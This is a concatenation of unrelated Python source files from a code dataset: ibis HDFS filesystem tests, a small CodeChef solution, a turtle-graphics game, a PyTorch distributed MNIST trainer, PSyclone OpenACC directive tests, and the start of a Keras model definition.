if cls.ENV.auth_mechanism in ['GSSAPI', 'LDAP']:\n print(\"Warning: ignoring invalid Certificate Authority errors\")\n cls.hdfs = ibis.hdfs_connect(host=cls.ENV.nn_host,\n port=cls.ENV.webhdfs_port,\n auth_mechanism=cls.ENV.auth_mechanism,\n verify=(cls.ENV.auth_mechanism\n not in ['GSSAPI', 'LDAP']))\n cls.hdfs.mkdir(cls.tmp_dir)\n\n @classmethod\n def tearDownClass(cls):\n try:\n cls.hdfs.rmdir(cls.tmp_dir)\n except:\n pass\n\n def setUp(self):\n self.test_files = []\n self.test_directories = []\n\n def tearDown(self):\n self._delete_test_files()\n pass\n\n def _delete_test_files(self):\n for path in self.test_files:\n try:\n os.remove(path)\n except os.error:\n pass\n\n for path in self.test_directories:\n try:\n shutil.rmtree(path)\n except os.error:\n pass\n\n def _make_test_directory(self, files=5, filesize=1024, directory=None):\n if directory is None:\n directory = util.guid()\n os.mkdir(directory)\n self.test_directories.append(directory)\n\n for i in range(files):\n self._make_random_file(size=filesize, directory=directory)\n\n return directory\n\n def _make_random_file(self, size=1024, directory=None):\n path = util.guid()\n\n if directory:\n path = osp.join(directory, path)\n\n units = size / 32\n\n with open(path, 'wb') as f:\n for i in range(int(units)):\n f.write(guidbytes())\n\n self.test_files.append(path)\n return path\n\n def _make_random_hdfs_file(self, size=1024, directory=None):\n local_path = self._make_random_file(size=size)\n remote_path = pjoin(directory or self.tmp_dir, local_path)\n self.hdfs.put(remote_path, local_path)\n return remote_path\n\n def test_mkdir(self):\n path = pjoin(self.tmp_dir, 'mkdir-test')\n self.hdfs.mkdir(path)\n assert self.hdfs.exists(path)\n\n def test_chmod(self):\n new_permissions = '755'\n path = self._make_random_hdfs_file()\n self.hdfs.chmod(path, new_permissions)\n assert self.hdfs.status(path)['permission'] == new_permissions\n\n def test_chmod_directory(self):\n new_permissions = '755'\n path = pjoin(self.tmp_dir, util.guid())\n self.hdfs.mkdir(path)\n self.hdfs.chmod(path, new_permissions)\n assert self.hdfs.status(path)['permission'] == new_permissions\n\n def test_mv_to_existing_file(self):\n remote_file = self._make_random_hdfs_file()\n existing_remote_file_dest = self._make_random_hdfs_file()\n self.hdfs.mv(remote_file, existing_remote_file_dest)\n\n def test_mv_to_existing_file_no_overwrite(self):\n remote_file = self._make_random_hdfs_file()\n existing_remote_file_dest = self._make_random_hdfs_file()\n with self.assertRaises(Exception):\n self.hdfs.mv(remote_file, existing_remote_file_dest,\n overwrite=False)\n\n def test_mv_to_directory(self):\n remote_file = self._make_random_hdfs_file()\n dest_dir = pjoin(self.tmp_dir, util.guid())\n self.hdfs.mkdir(dest_dir)\n self.hdfs.mv(remote_file, dest_dir)\n new_remote_file = pjoin(dest_dir, os.path.basename(remote_file))\n file_status = self.hdfs.status(new_remote_file)\n assert file_status['type'] == 'FILE'\n\n def test_put_get_delete_file(self):\n dirpath = pjoin(self.tmp_dir, 'write-delete-test')\n self.hdfs.mkdir(dirpath)\n\n lpath = self._make_random_file()\n fpath = pjoin(dirpath, lpath)\n\n self.hdfs.put(fpath, lpath)\n assert self.hdfs.exists(fpath)\n\n try:\n dpath = util.guid()\n self.hdfs.get(fpath, dpath)\n assert _contents_equal(dpath, lpath)\n os.remove(dpath)\n finally:\n self.hdfs.rm(fpath)\n assert not self.hdfs.exists(fpath)\n\n def test_overwrite_file(self):\n pass\n\n def test_put_get_directory(self):\n local_dir = util.guid()\n local_download_dir = util.guid()\n\n K = 5\n\n os.mkdir(local_dir)\n\n try:\n for i in range(K):\n self._make_random_file(directory=local_dir)\n\n remote_dir = pjoin(self.tmp_dir, local_dir)\n self.hdfs.put(remote_dir, local_dir)\n\n assert self.hdfs.exists(remote_dir)\n assert len(self.hdfs.ls(remote_dir)) == K\n\n # download directory and check contents\n self.hdfs.get(remote_dir, local_download_dir)\n\n _check_directories_equal(local_dir, local_download_dir)\n\n self._try_delete_directory(local_download_dir)\n\n self.hdfs.rmdir(remote_dir)\n assert not self.hdfs.exists(remote_dir)\n finally:\n shutil.rmtree(local_dir)\n\n def test_put_file_into_directory(self):\n local_path = self._make_random_file()\n self.hdfs.put(self.tmp_dir, local_path)\n remote_file_path = pjoin(self.tmp_dir, local_path)\n file_status = self.hdfs.status(remote_file_path)\n assert file_status['type'] == 'FILE'\n\n def test_get_file_overwrite(self):\n local_path = self._make_random_file()\n local_path2 = self._make_random_file()\n\n remote_path = pjoin(self.tmp_dir, local_path)\n self.hdfs.put(remote_path, local_path)\n\n remote_path2 = pjoin(self.tmp_dir, local_path2)\n self.hdfs.put(remote_path2, local_path2)\n\n with self.assertRaises(Exception):\n self.hdfs.get(remote_path, '.')\n\n self.hdfs.get(remote_path, local_path2, overwrite=True)\n assert open(local_path2).read() == open(local_path).read()\n\n def test_put_buffer_like(self):\n data = b'peekaboo'\n\n buf = BytesIO()\n buf.write(data)\n buf.seek(0)\n\n remote_path = pjoin(self.tmp_dir, util.guid())\n self.hdfs.put(remote_path, buf)\n\n local_path = util.guid()\n self.test_files.append(local_path)\n\n self.hdfs.get(remote_path, local_path)\n assert open(local_path, 'rb').read() == data\n\n def test_get_logging(self):\n # TODO write a test for this\n pass\n\n def test_get_directory_nested_dirs(self):\n local_dir = util.guid()\n local_download_dir = util.guid()\n\n K = 5\n\n os.mkdir(local_dir)\n\n try:\n for i in range(K):\n self._make_random_file(directory=local_dir)\n\n nested_dir = osp.join(local_dir, 'nested-dir')\n shutil.copytree(local_dir, nested_dir)\n\n remote_dir = pjoin(self.tmp_dir, local_dir)\n self.hdfs.put(remote_dir, local_dir)\n\n # download directory and check contents\n self.hdfs.get(remote_dir, local_download_dir)\n\n _check_directories_equal(local_dir, local_download_dir)\n\n self._try_delete_directory(local_download_dir)\n\n self.hdfs.rmdir(remote_dir)\n assert not self.hdfs.exists(remote_dir)\n finally:\n shutil.rmtree(local_dir)\n\n def test_get_directory_overwrite_file(self):\n try:\n local_path1 = self._make_test_directory()\n local_path2 = self._make_random_file()\n remote_path = pjoin(self.tmp_dir, local_path1)\n self.hdfs.put(remote_path, local_path1)\n self.hdfs.get(remote_path, local_path2, overwrite=True)\n _check_directories_equal(local_path1, local_path2)\n finally:\n # Path changed from file to directory, must be cleaned manually.\n self._try_delete_directory(local_path2)\n\n def test_get_directory_overwrite_directory(self):\n local_path1 = self._make_test_directory()\n local_path2 = self._make_test_directory()\n remote_path = pjoin(self.tmp_dir, local_path2)\n self.hdfs.put(remote_path, local_path1)\n self.hdfs.get(remote_path, osp.dirname(local_path2), overwrite=True)\n _check_directories_equal(local_path1, local_path2)\n\n def test_get_directory_into_directory(self):\n local_path1 = self._make_test_directory()\n local_path2 = self._make_test_directory()\n remote_path = pjoin(self.tmp_dir, local_path1)\n self.hdfs.put(remote_path, local_path1)\n local_path3 = self.hdfs.get(remote_path, local_path2)\n _check_directories_equal(local_path3, local_path1)\n\n def _try_delete_directory(self, path):\n try:\n shutil.rmtree(path)\n except os.error:\n pass\n\n def test_ls(self):\n test_dir = pjoin(self.tmp_dir, 'ls-test')\n self.hdfs.mkdir(test_dir)\n for i in range(10):\n local_path = self._make_random_file()\n hdfs_path = pjoin(test_dir, local_path)\n self.hdfs.put(hdfs_path, local_path)\n assert len(self.hdfs.ls(test_dir)) == 10\n\n def test_size(self):\n test_dir = pjoin(self.tmp_dir, 'size-test')\n\n K = 2048\n path = self._make_random_file(size=K)\n hdfs_path = pjoin(test_dir, path)\n self.hdfs.put(hdfs_path, path)\n assert self.hdfs.size(hdfs_path) == K\n\n size_test_dir = self._sample_nested_directory()\n\n hdfs_path = pjoin(test_dir, size_test_dir)\n self.hdfs.put(hdfs_path, size_test_dir)\n\n assert self.hdfs.size(hdfs_path) == K * 7\n\n def test_put_get_tarfile(self):\n test_dir = pjoin(self.tmp_dir, 'tarfile-test')\n\n dirname = self._sample_nested_directory()\n\n import subprocess\n tf_name = '{0}.tar.gz'.format(dirname)\n cmd = 'tar zc {0} > {1}'.format(dirname, tf_name)\n\n retcode = subprocess.call(cmd, shell=True)\n if retcode:\n raise Exception((retcode, cmd))\n\n self.test_files.append(tf_name)\n\n randname = util.guid()\n hdfs_path = pjoin(test_dir, randname)\n self.hdfs.put_tarfile(hdfs_path, tf_name, compression='gzip')\n\n self.hdfs.get(hdfs_path, '.')\n self.test_directories.append(randname)\n _check_directories_equal(osp.join(randname, dirname), dirname)\n\n def _sample_nested_directory(self):\n K = 2048\n dirname = self._make_test_directory(files=2, filesize=K)\n nested_dir = osp.join(dirname, util.guid())\n os.mkdir(nested_dir)\n\n self._make_test_directory(files=5, filesize=K,\n directory=nested_dir)\n\n return dirname\n\n\n@pytest.mark.hdfs\n@pytest.mark.superuser\nclass TestSuperUserHDFSE2E(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.ENV = ENV\n cls.tmp_dir = pjoin(cls.ENV.tmp_dir, util.guid())\n if cls.ENV.auth_mechanism in ['GSSAPI', 'LDAP']:\n print(\"Warning: ignoring invalid Certificate Authority errors\")\n # NOTE: specifying superuser as set in IbisTestEnv\n cls.hdfs = ibis.hdfs_connect(host=cls.ENV.nn_host,\n port=cls.ENV.webhdfs_port,\n auth_mechanism=cls.ENV.auth_mechanism,\n verify=(cls.ENV.auth_mechanism\n not in ['GSSAPI', 'LDAP']),\n user=cls.ENV.hdfs_superuser)\n cls.hdfs.mkdir(cls.tmp_dir)\n\n @classmethod\n def tearDownClass(cls):\n try:\n cls.hdfs.rmdir(cls.tmp_dir)\n except:\n pass\n\n def setUp(self):\n self.test_files = []\n self.test_directories = []\n\n def tearDown(self):\n self._delete_test_files()\n pass\n\n def _delete_test_files(self):\n for path in self.test_files:\n try:\n os.remove(path)\n except os.error:\n pass\n\n for path in self.test_directories:\n try:\n shutil.rmtree(path)\n except os.error:\n pass\n\n def _make_random_file(self, size=1024, directory=None):\n path = util.guid()\n\n if directory:\n path = osp.join(directory, path)\n\n units = size / 32\n\n with open(path, 'wb') as f:\n for i in range(int(units)):\n f.write(guidbytes())\n\n self.test_files.append(path)\n return path\n\n def _make_random_hdfs_file(self, size=1024, directory=None):\n local_path = self._make_random_file(size=size)\n remote_path = pjoin(directory or self.tmp_dir, local_path)\n self.hdfs.put(remote_path, local_path)\n return remote_path\n\n def test_chown_owner(self):\n new_owner = 'randomowner'\n path = self._make_random_hdfs_file()\n self.hdfs.chown(path, new_owner)\n assert self.hdfs.status(path)['owner'] == new_owner\n\n def test_chown_group(self):\n new_group = 'randomgroup'\n path = self._make_random_hdfs_file()\n self.hdfs.chown(path, group=new_group)\n assert self.hdfs.status(path)['group'] == new_group\n\n def test_chown_group_directory(self):\n new_group = 'randomgroup'\n path = pjoin(self.tmp_dir, util.guid())\n self.hdfs.mkdir(path)\n self.hdfs.chown(path, group=new_group)\n assert self.hdfs.status(path)['group'] == new_group\n\n def test_chown_owner_directory(self):\n new_owner = 'randomowner'\n path = pjoin(self.tmp_dir, util.guid())\n self.hdfs.mkdir(path)\n self.hdfs.chown(path, new_owner)\n assert self.hdfs.status(path)['owner'] == new_owner\n\n\ndef _check_directories_equal(left, right):\n left_files = _get_all_files(left)\n right_files = _get_all_files(right)\n\n assert set(left_files.keys()) == set(right_files.keys())\n\n for relpath, labspath in left_files.items():\n rabspath = right_files[relpath]\n assert _contents_equal(rabspath, labspath)\n\n\ndef _contents_equal(left, right):\n with open(left) as lf:\n with open(right) as rf:\n return lf.read() == rf.read()\n\n\ndef _get_all_files(path):\n paths = {}\n for dirpath, _, filenames in os.walk(path):\n rel_dir = osp.relpath(dirpath, path)\n if rel_dir == '.':\n rel_dir = ''\n for name in filenames:\n abspath = osp.join(dirpath, name)\n relpath = osp.join(rel_dir, name)\n paths[relpath] = abspath\n\n return paths\n\n\ndef guidbytes():\n if compat.PY3:\n return util.guid().encode('utf8')\n else:\n return util.guid()\n","sub_path":"ibis/tests/test_filesystems.py","file_name":"test_filesystems.py","file_ext":"py","file_size_in_byte":16773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"85307008","text":"'''\n2\n5 1 1\n1 1 1 1 1\n2 1 1\n1 2\n'''\nfrom collections import Counter\nfor _ in range(int(input())):\n n, a, b = [int(x) for x in input().split()]\n arr = [int(x) for x in input().split()]\n arrc= Counter(arr)\n ans = (arrc[a] / n) * (arrc[b] / n)\n print(ans)\n","sub_path":"codechef/May18_1_NAICHEF.py","file_name":"May18_1_NAICHEF.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"324292323","text":"import turtle \n\n\nscreen=turtle.Screen()\nscreen.bgcolor(\"whitesmoke\")\nt=turtle.Turtle()\nt.hideturtle()\nm=t.clone()\nm.hideturtle()\ne=t.clone()\ne.hideturtle()\nh=t.clone()\nh.hideturtle()\nt.shape(\"circle\")\nm.shape(\"square\")\ne.shape(\"square\")\nh.shape(\"square\")\nt.shapesize(3)\nm.shapesize(5)\ne.shapesize(4)\nh.shapesize(7)\nt.color(\"dodgerblue\")\nm.color(\"gold\")\ne.color(\"springgreen\")\nh.color(\"red\")\nt.speed(0)\nscreen.update()\n\nscreen.bgpic('Planebackground.png')\n\nt.pu()\nt.goto(0,-220)\nt.showturtle()\nt.setheading(90)\n\nscreen.title(\"the coolest game you have ever seen\")\n\n\n\ndef medium():\n \n m.pu()\n m.goto(0,550)\n m.showturtle()\n m.setheading(270)\n m.fd(1050)\n \n\ndef medium2():\n \n \n m.pu()\n \n m.goto(-200,550)\n m.showturtle()\n\n \n \n m.setheading(270)\n m.fd(1050)\n\ndef medium3():\n \n m.pu()\n m.goto(300,550)\n m.showturtle()\n \n m.setheading(270)\n m.fd(1050)\n\ndef easy():\n \n e.pu()\n e.goto(-200,550)\n e.showturtle()\n \n\n e.setheading(270)\n e.fd(1050)\n\nscreen.listen()\n\ndef easy2():\n \n e.pu()\n e.goto(150,550)\n e.showturtle()\n \n\n e.setheading(270)\n e.fd(1050)\n \nscreen.listen()\n\ndef easy3():\n \n e.pu()\n e.goto(50,550)\n e.showturtle()\n \n\n e.setheading(270)\n e.fd(1050)\n\nscreen.listen()\n\ndef hard():\n \n h.pu()\n h.goto(0,630)\n h.showturtle()\n \n\n h.setheading(270)\n h.fd(1150)\n\nscreen.listen()\n \ndef hard2():\n\n h.pu()\n h.goto(200,630)\n h.showturtle()\n \n\n h.setheading(270)\n h.fd(1150)\n\nscreen.listen()\n\ndef hard3():\n\n h.pu()\n h.goto(-200,630)\n h.showturtle()\n \n\n h.setheading(270)\n h.fd(1150)\n\nscreen.listen()\n\ndef hit():\n print(\"baba\")\n if t.distance(m.pos()) < 100:\n screen.clear()\n print(\"haha\")\n \n if t.distance(e.pos()) < 100:\n t.clear()\n print(\"haha\")\n \n if t.distance(h.pos()) < 100:\n t.clear() \n print(\"haha\") \n\ndef left():\n t.setheading(180)\n t.forward(25)\n t.forward(25)\n \ndef right():\n t.setheading(0)\n t.forward(25)\n t.forward(25)\n \nscreen.onkey(left, 'Left')\nscreen.onkey(right, 'Right')\nscreen.ontimer(hit(), 1000)\n\nmedium2()\neasy2()\nhard3()\nm.hideturtle()\nm.goto(0,500)\nm.showturtle()\ne.hideturtle()\ne.goto(0,500)\ne.showturtle()\nh.hideturtle()\nh.goto(0,500)\nh.showturtle()\nmedium()\neasy3()\nhard()\nm.hideturtle()\nm.goto(0,500)\nm.showturtle()\ne.hideturtle()\ne.goto(0,500)\ne.showturtle()\nh.hideturtle()\nh.goto(0,500)\nh.showturtle()\nmedium2()\neasy()\nhard2()\nm.hideturtle()\nm.goto(0,500)\nm.showturtle()\ne.hideturtle()\ne.goto(0,500)\ne.showturtle()\nh.hideturtle()\nh.goto(0,500)\nh.showturtle()\nmedium()\neasy3()\nhard()\nm.hideturtle()\nm.goto(0,500)\nm.showturtle()\ne.hideturtle()\ne.goto(0,500)\ne.showturtle()\nh.hideturtle()\nh.goto(0,500)\nh.showturtle()\n\n\nscreen.mainloop()","sub_path":"Codes/LeoGame.py","file_name":"LeoGame.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"334250942","text":"\"\"\"\nAdapted from PyTorch 1.0 Distributed Trainer with Amazon AWS\n\"\"\"\n\n\nimport time\nimport sys\nimport torch\nimport argparse\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.distributed as dist\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\n\nfrom torch.multiprocessing import Pool, Process\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\nfrom torch.utils import data\nfrom torch.utils.data.distributed import DistributedSampler\n\nclass Average(object):\n def __init__(self):\n self.sum = 0\n self.count = 0\n\n def update(self, value, number):\n self.sum += value * number\n self.count += number\n\n @property\n def average(self):\n return self.sum / self.count\n\n def __str__(self):\n return '{:.6f}'.format(self.average)\n\n\nclass Accuracy(object):\n def __init__(self):\n self.correct = 0\n self.count = 0\n\n def update(self, output, label):\n predictions = output.data.argmax(dim=1)\n correct = predictions.eq(label.data).sum().item()\n\n self.correct += correct\n self.count += output.size(0)\n\n @property\n def accuracy(self):\n return self.correct / self.count\n\n def __str__(self):\n return '{:.2f}%'.format(self.accuracy * 100)\n\n\nclass Trainer(object):\n def __init__(self, net, optimizer, train_loader, test_loader, loss):\n self.net = net\n self.optimizer = optimizer\n self.train_loader = train_loader\n self.test_loader = test_loader\n self.loss = loss\n\n def fit(self, epochs):\n for epoch in range(1, epochs + 1):\n epoch_start = time.time()\n train_loss, train_acc = self.train()\n test_loss, test_acc = self.evaluate()\n epoch_time = time.time()-epoch_start\n print(\n 'Epoch: {}/{},'.format(epoch, epochs),\n 'train loss: {}, train acc: {},'.format(train_loss, train_acc),\n 'test loss: {}, test acc: {}.'.format(test_loss, test_acc),\n 'epoch time: {}'.format(epoch_time))\n\n def train(self):\n train_loss = Average()\n train_acc = Accuracy()\n\n self.net.train()\n\n for data, label in self.train_loader:\n data = data.cuda(non_blocking=True)\n label = label.cuda(non_blocking=True)\n\n output = self.net(data)\n loss = self.loss(output, label)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n train_loss.update(loss.item(), data.size(0))\n train_acc.update(output, label)\n\n return train_loss, train_acc\n\n def evaluate(self):\n test_loss = Average()\n test_acc = Accuracy()\n\n self.net.eval()\n\n with torch.no_grad():\n for data, label in self.test_loader:\n data = data.cuda(non_blocking=True)\n label = label.cuda(non_blocking=True)\n\n output = self.net(data)\n loss = F.cross_entropy(output, label)\n\n test_loss.update(loss.item(), data.size(0))\n test_acc.update(output, label)\n\n return test_loss, test_acc\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.fc = nn.Linear(784, 10)\n\n def forward(self, x):\n return self.fc(x.view(x.size(0), -1))\n\n\ndef get_dataloader(root, batch_size):\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.1307, ), (0.3081, ))])\n\n train_set = datasets.MNIST(\n root, train=True, transform=transform, download=True)\n sampler = DistributedSampler(train_set)\n\n train_loader = data.DataLoader(\n train_set,\n batch_size=batch_size,\n shuffle=(sampler is None),\n sampler=sampler)\n\n test_loader = data.DataLoader(\n datasets.MNIST(root, train=False, transform=transform, download=True),\n batch_size=batch_size,\n shuffle=False)\n\n return train_loader, test_loader\n\n\nif __name__ == '__main__':\n \n initial_time = time.time()\n print(\"Collect Inputs...\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--local_rank\", type=int)\n parser.add_argument(\"--dir\", type=str, default='./data')\n parser.add_argument(\"--batch\", type=int, default=32)\n parser.add_argument(\"--epochs\", type=int, default=10)\n args = parser.parse_args()\n \n \n\n # Batch Size for training and testing\n batch_size = args.batch\n \n # Number of additional worker processes for dataloading\n workers = 2\n\n # Number of epochs to train for\n num_epochs = args.epochs\n\n # Starting Learning Rate\n starting_lr = 0.1\n\n # Distributed backend type\n dist_backend = 'nccl'\n print(\"Data Directory: {}\".format(args.dir))\n print(\"Batch Size: {}\".format(args.batch))\n print(\"Max Number of Epochs: {}\".format(args.epochs))\n print(\"Initialize Process Group...\")\n\n torch.cuda.set_device(args.local_rank)\n\n torch.distributed.init_process_group(backend=dist_backend,\n init_method='env://')\n torch.multiprocessing.set_start_method('spawn')\n\n\n # Establish Local Rank and set device on this node\n local_rank = args.local_rank\n dp_device_ids = [local_rank]\n\n print(\"Initialize Model...\")\n # Construct Model\n model = Net().cuda()\n # Make model DistributedDataParallel\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=dp_device_ids, output_device=local_rank)\n\n # define loss function (criterion) and optimizer\n loss = nn.CrossEntropyLoss().cuda()\n optimizer = torch.optim.SGD(model.parameters(), starting_lr, momentum=0.9, weight_decay=1e-4)\n\n print(\"Initialize Dataloaders...\")\n train_loader, test_loader = get_dataloader(args.dir, batch_size)\n print(\"Training...\")\n trainer = Trainer(model, optimizer, train_loader, test_loader, loss)\n trainer.fit(num_epochs)\n\n print(\"Total time: {:.3f}s\".format(time.time()-initial_time))","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394492636","text":"# -----------------------------------------------------------------------------\n# BSD 3-Clause License\n#\n# Copyright (c) 2019-2021, Science and Technology Facilities Council.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n# -----------------------------------------------------------------------------\n# Authors: R. W. Ford, A. R. Porter and S. Siso, STFC Daresbury Lab\n\n'''Module containing py.test tests for the transformation of the PSy\n representation of NEMO code using the OpenACC parallel directive.\n\n'''\n\nfrom __future__ import print_function, absolute_import\nfrom fparser.common.readfortran import FortranStringReader\nfrom psyclone.psyGen import PSyFactory, TransInfo\nfrom psyclone.psyir.nodes import ACCParallelDirective\n\n\n# The PSyclone API under test\nAPI = \"nemo\"\n\n\nSINGLE_LOOP = (\"program do_loop\\n\"\n \"integer :: ji\\n\"\n \"integer, parameter :: jpj=128\\n\"\n \"real(kind=wp) :: sto_tmp(jpj)\\n\"\n \"do ji = 1,jpj\\n\"\n \" sto_tmp(ji) = 1.0d0\\n\"\n \"end do\\n\"\n \"end program do_loop\\n\")\n\n\ndef test_parallel_single_loop(parser):\n ''' Check that we can apply the transformation to a single, explicit\n loop. '''\n reader = FortranStringReader(SINGLE_LOOP)\n code = parser(reader)\n psy = PSyFactory(API, distributed_memory=False).create(code)\n schedule = psy.invokes.invoke_list[0].schedule\n data_trans = TransInfo().get_trans_name('ACCDataTrans')\n acc_trans = TransInfo().get_trans_name('ACCParallelTrans')\n acc_trans.apply(schedule[0:1])\n data_trans.apply(schedule[0])\n code = str(psy.gen)\n\n assert (\"PROGRAM do_loop\\n\"\n \" INTEGER :: ji\\n\"\n \" INTEGER, PARAMETER :: jpj = 128\\n\"\n \" REAL(KIND = wp) :: sto_tmp(jpj)\\n\"\n \" !$ACC DATA COPYOUT(sto_tmp)\\n\"\n \" !$ACC PARALLEL DEFAULT(PRESENT)\\n\"\n \" DO ji = 1, jpj\\n\"\n \" sto_tmp(ji) = 1.0D0\\n\"\n \" END DO\\n\"\n \" !$ACC END PARALLEL\\n\"\n \" !$ACC END DATA\\n\"\n \"END PROGRAM do_loop\" in code)\n\n\ndef test_parallel_two_loops(parser):\n ''' Check that we can enclose two loops within a parallel region. '''\n reader = FortranStringReader(\"program do_loop\\n\"\n \"integer :: ji\\n\"\n \"integer, parameter :: jpi=11\\n\"\n \"real :: sto_tmp(jpi), sto_tmp2(jpi)\\n\"\n \"do ji = 1,jpi\\n\"\n \" sto_tmp(ji) = 1.0d0\\n\"\n \"end do\\n\"\n \"do ji = 1,jpi\\n\"\n \" sto_tmp2(ji) = 1.0d0\\n\"\n \"end do\\n\"\n \"end program do_loop\\n\")\n code = parser(reader)\n psy = PSyFactory(API, distributed_memory=False).create(code)\n schedule = psy.invokes.invoke_list[0].schedule\n data_trans = TransInfo().get_trans_name('ACCDataTrans')\n acc_trans = TransInfo().get_trans_name('ACCParallelTrans')\n acc_trans.apply(schedule[0:2])\n data_trans.apply(schedule[0])\n code = str(psy.gen)\n assert (\"PROGRAM do_loop\\n\"\n \" INTEGER :: ji\\n\"\n \" INTEGER, PARAMETER :: jpi = 11\\n\"\n \" REAL :: sto_tmp(jpi), sto_tmp2(jpi)\\n\"\n \" !$ACC DATA COPYOUT(sto_tmp,sto_tmp2)\\n\"\n \" !$ACC PARALLEL DEFAULT(PRESENT)\\n\"\n \" DO ji = 1, jpi\\n\"\n \" sto_tmp(ji) = 1.0D0\\n\"\n \" END DO\\n\"\n \" DO ji = 1, jpi\\n\"\n \" sto_tmp2(ji) = 1.0D0\\n\"\n \" END DO\\n\"\n \" !$ACC END PARALLEL\\n\"\n \" !$ACC END DATA\\n\"\n \"END PROGRAM do_loop\" in code)\n\n\ndef test_parallel_if_block(parser):\n ''' Check that we can enclose an IF-block within a parallel region. '''\n reader = FortranStringReader(\"program do_loop\\n\"\n \"integer :: ji\\n\"\n \"integer, parameter :: jpi=64\\n\"\n \"logical :: init\\n\"\n \"real :: sto_tmp(jpi), sto_tmp2(jpi)\\n\"\n \"if(init)then\\n\"\n \" do ji = 1,jpi\\n\"\n \" sto_tmp(ji) = 1.0d0\\n\"\n \" end do\\n\"\n \"else\\n\"\n \" do ji = 1,jpi\\n\"\n \" sto_tmp2(ji) = 1.0d0\\n\"\n \" end do\\n\"\n \"end if\\n\"\n \"end program do_loop\\n\")\n code = parser(reader)\n psy = PSyFactory(API, distributed_memory=False).create(code)\n schedule = psy.invokes.invoke_list[0].schedule\n data_trans = TransInfo().get_trans_name('ACCDataTrans')\n acc_trans = TransInfo().get_trans_name('ACCParallelTrans')\n acc_trans.apply(schedule[0:1])\n data_trans.apply(schedule[0])\n code = str(psy.gen)\n assert (\" !$ACC DATA COPYOUT(sto_tmp,sto_tmp2)\\n\"\n \" !$ACC PARALLEL DEFAULT(PRESENT)\\n\"\n \" IF (init) THEN\\n\"\n \" DO ji = 1, jpi\\n\" in code)\n assert (\" END DO\\n\"\n \" END IF\\n\"\n \" !$ACC END PARALLEL\\n\"\n \" !$ACC END DATA\\n\" in code)\n\n\ndef test_parallel_repeat_update(parser):\n ''' Check that calling ACCParallelDirective.update() a 2nd time\n does not alter the fparser2 parse tree. '''\n reader = FortranStringReader(SINGLE_LOOP)\n code = parser(reader)\n psy = PSyFactory(API, distributed_memory=False).create(code)\n schedule = psy.invokes.invoke_list[0].schedule\n data_trans = TransInfo().get_trans_name('ACCDataTrans')\n acc_trans = TransInfo().get_trans_name('ACCParallelTrans')\n acc_trans.apply(schedule.children[0:1])\n data_trans.apply(schedule[0])\n accdir = schedule[0].dir_body[0]\n assert isinstance(accdir, ACCParallelDirective)\n assert accdir._ast is None\n # Generate the code in order to trigger the update of the fparser2 tree\n _ = str(psy.gen)\n # Store the content of a part of the fparser2 parse tree\n orig_content = accdir._ast.parent.content[:]\n # Call update() a second time and then check that nothing has changed\n accdir.update()\n for idx, item in enumerate(orig_content):\n assert item is accdir._ast.parent.content[idx]\n","sub_path":"src/psyclone/tests/nemo/transformations/openacc/parallel_directive_test.py","file_name":"parallel_directive_test.py","file_ext":"py","file_size_in_byte":7880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451038901","text":"#!/usr/bin/env python3\n#-*- coding: utf-8\n\nimport importlib\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\n#Network\nfrom keras.models import Sequential,Model\nfrom keras.layers import Input,Activation\nfrom keras.layers import Dense, Dropout, Flatten, GlobalAveragePooling2D\nfrom keras.layers import ZeroPadding2D,Convolution2D, MaxPooling2D\nfrom keras import backend, optimizers\nfrom keras.utils import multi_gpu_model\nfrom keras.applications import vgg16\nfrom keras import regularizers\nfrom keras_contrib.layers import GroupNormalization\n\n#Locals\nfrom Utils import CacheManager\nfrom Models.GenericEnsemble import GenericEnsemble\n\nclass SNet(GenericEnsemble):\n \"\"\"\n Implements abstract methods from GenericModel.\n Model is the same as in: 